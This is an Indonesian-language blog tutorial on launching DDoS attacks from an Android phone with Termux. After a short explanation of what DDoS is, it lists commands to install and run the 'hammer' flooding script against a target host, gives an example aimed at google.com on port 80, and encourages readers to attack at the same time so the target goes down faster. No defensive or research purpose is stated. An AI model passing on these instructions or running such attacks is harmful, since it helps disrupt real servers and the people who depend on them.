-->

Cara DDoS Lewat Termux Update 2019

Cara DDoS Lewat Termux Update 2019

di postingan kali ini saya akan membahas tentang ddos attack yaitu tutorial cara melakukan ddos menggunakan andoid, tetapi sebelumnya apakah kalian tau apa itu DDoS attack ? jika belum tau saya akan memberi sedikit penjelasanya.

Pengertian DDoS


DDoS attack atau serangan DDoS merupakan jenis serangan yang di tujukan kepada komputer atau server dengan tujuan menghabiskan sumber daya yang di miliki oleh komputer sehingga komputer tersebut tidak dapat berjalan dengan semestinya atau terkadang bisa membuat server menjadi down dan tidak bisa di aksese sama sekali.

Cara Kerja DDoS


biasanya serangan DDoS di lakukan oleh lebih dari satu perangkat karena cara kerja serangan ddos yaitu dengan cara mengirimkan permintaan ke server sebanyak banyaknya dari berbagai perangkat sehingga server koalahan dalam merespon setiap permintaan akhirnya server akan kelebihan bandwidh dan tidak bisa berjalan dengan normal, hal ini memudahkan penyerang dalam mencari celah yang ada pada suatu server.

Cara DDoS lewat Android


DDos lebih sering di lakukan menggunakan komputer karena memiliki perbagai tools yang dapat di gunakan, tetapi sebenarnya DDos juga dapat kita lakukan menggunakan perangkat android yang akan kita bahas di postingan ini.

untuk melakukan serangan ddos menggunakan android kita tentu membutuhkan aplikasi tambahan yaitu termux, termux akan kita guanakan untuk menginstall script ddos attacknya yaitu hamer, untuk tutorial penginstalanya silahkan simak sebagai berikut.

buka aplikasi termux kalian kemudian jalankan perintah - perintah berikut secara urut untuk menginstall tool hammer.

apt update && apt upgrade -y
apt update && apt upgrade -y
pkg install python
pkg install git
git clone https://github.com/cyweb/hammer
cd hammer
python hammer.py -h

setelah kalian selesai menginstallnua sekarang tinggal kita jalankan, simak langkah langkah berikut.

masuk ke folder

cd hammer

kemudian jalankan hammer dengan perintah

python hammer.py

untuk menyerang target kalan tinggal jalankan perintahnya seperti ini

python hammer.py -s [IP TARGET YANG INGIN DI DDOS] -p 80 -t 135

misal : python hammer.py -s www.google.com -p 80 -t 135
cara ddos attack di termux

lalu biarkan proses ddos berjalan, agar target cepat down sebaiknya serangan ini di lakukan secara bersamaan karena semakin banyak penyerang akan semakin bagus, demikian tutorial dari saya semoga bermanfaat dn sampai jumpa di postingan berikutnya.

Related Posts

Post a Comment

Subscribe Our Newsletter